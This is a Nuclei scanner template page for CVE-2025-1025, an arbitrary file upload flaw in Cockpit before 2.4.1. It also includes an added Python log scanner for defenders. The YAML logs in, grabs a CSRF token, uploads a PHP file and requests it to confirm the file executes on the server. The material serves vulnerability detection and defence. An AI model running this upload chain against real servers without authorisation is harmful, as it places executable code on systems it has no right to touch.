Cockpit < 2.4.1 - Arbitrary File Upload
ID: CVE-2025-1025
Severity: high
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2025,cockpit,file-upload,rce,intrusive
Description
Versions of the package cockpit-hq/cockpit before 2.4.1 are vulnerable to Arbitrary File Upload where an attacker can use different extensions to bypass the upload filter.
YAML Source
id: CVE-2025-1025

info:
  name: Cockpit < 2.4.1 - Arbitrary File Upload
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Versions of the package cockpit-hq/cockpit before 2.4.1 are vulnerable to Arbitrary File Upload where an attacker can use different extensions to bypass the upload filter.
  reference:
    - https://github.com/advisories/GHSA-wp68-xrfg-xvq4
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1025
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-1025
    cwe-id: CWE-434
  metadata:
    max-request: 4
    verified: true
    shodan-query: title:"Cockpit"
  tags: cve,cve2025,cockpit,file-upload,rce,intrusive

flow: http(1) && http(2) && http(3)

variables:
  username: "{{username}}"
  password: "{{password}}"
  marker: "{{randstr_1}}"

http:
  - raw:
      - |
        GET /auth/login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /auth/check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=UTF-8

        {"auth":{"user":"{{username}}","password":"{{password}}"},"csrf":"{{csrf}}"}

    matchers:
      - type: word
        part: body
        words:
          - 'success":true'
          - '"role":'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: csrf
        group: 1
        part: body
        regex:
          - 'csrf : "(.*?)"'
        internal: true

  - raw:
      - |
        POST /assets/upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3lKO5LogRxX0YStI

        ------WebKitFormBoundary3lKO5LogRxX0YStI
        Content-Disposition: form-data; name="folder"

        ------WebKitFormBoundary3lKO5LogRxX0YStI
        Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php"
        Content-Type: text/php

        <?php echo base64_decode($_GET["q"]);?>
        ------WebKitFormBoundary3lKO5LogRxX0YStI--

    matchers:
      - type: word
        part: body
        words:
          - '"uploaded":["{{randstr}}.php"]'
        internal: true

    extractors:
      - type: json
        name: upload_path
        part: body
        json:
          - '.assets[0].path'
        internal: true

  - raw:
      - |
        GET /storage/uploads/{{upload_path}}?q={{base64(marker)}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '{{marker}}'
# digest: 4a0a0047304502202a4acd412c5917237e8cfabc029c4fc70d73361c3ba88b960350426538d927a9022100d2e4aae916e5f42b057dba092a72983c36771975aaf7d55a1e69ffa09b716b41:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-1025.yaml"
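For the defender's side, the following added example (not part of the template or of the Cockpit project) scans web access logs for the pattern the template exercises: a POST to /assets/upload and a successful request for a script-type file under /storage/uploads/. The combined log format, the extension set and the sample lines are assumptions constructed for illustration; the extension set is a generic list of PHP-handled file types, not the advisory's bypass list.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Assumption: generic PHP-handled extensions, not taken from the advisory.
SCRIPT_EXTS = {".php", ".phtml", ".phar", ".pht", ".php5"}
# Assumption: Apache/nginx combined log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_script_path(path):
    """True if any path segment ends in a script extension (covers PATH_INFO)."""
    return any(posixpath.splitext(seg)[1].lower() in SCRIPT_EXTS
               for seg in path.split("/"))

def find_upload_exec(lines):
    """Return (ip, path, correlated) for each successful request to a
    script-type file under /storage/uploads/. 'correlated' is True when the
    same client earlier made a successful POST to /assets/upload."""
    uploaders, hits = set(), []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, status = m["ip"], int(m["status"])
        path = unquote(urlsplit(m["target"]).path)
        if m["method"] == "POST" and path == "/assets/upload" and status < 400:
            uploaders.add(ip)
        elif (path.startswith("/storage/uploads/") and status == 200
              and is_script_path(path)):
            hits.append((ip, path, ip in uploaders))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Feb/2025:10:00:01 +0000] "POST /assets/upload HTTP/1.1" 200 312 "-" "-"',
    '203.0.113.7 - - [01/Feb/2025:10:00:02 +0000] "GET /storage/uploads/2025/02/01/abc.php?q=dGVzdA== HTTP/1.1" 200 4 "-" "-"',
    '198.51.100.4 - - [01/Feb/2025:10:05:00 +0000] "GET /storage/uploads/2025/02/01/logo.png HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.9 - - [01/Feb/2025:10:06:00 +0000] "GET /storage/uploads/2025/02/01/x.PHTML HTTP/1.1" 200 10 "-" "-"',
    '198.51.100.9 - - [01/Feb/2025:10:06:05 +0000] "GET /storage/uploads/missing.php HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, path, correlated in find_upload_exec(SAMPLE_LOG):
        print(ip, path, "uploaded-by-same-client" if correlated else "uncorrelated")
```

Any hit is worth triage on its own, since an uploads directory should only ever serve static assets; the correlated flag just ranks the ones that follow an upload from the same client.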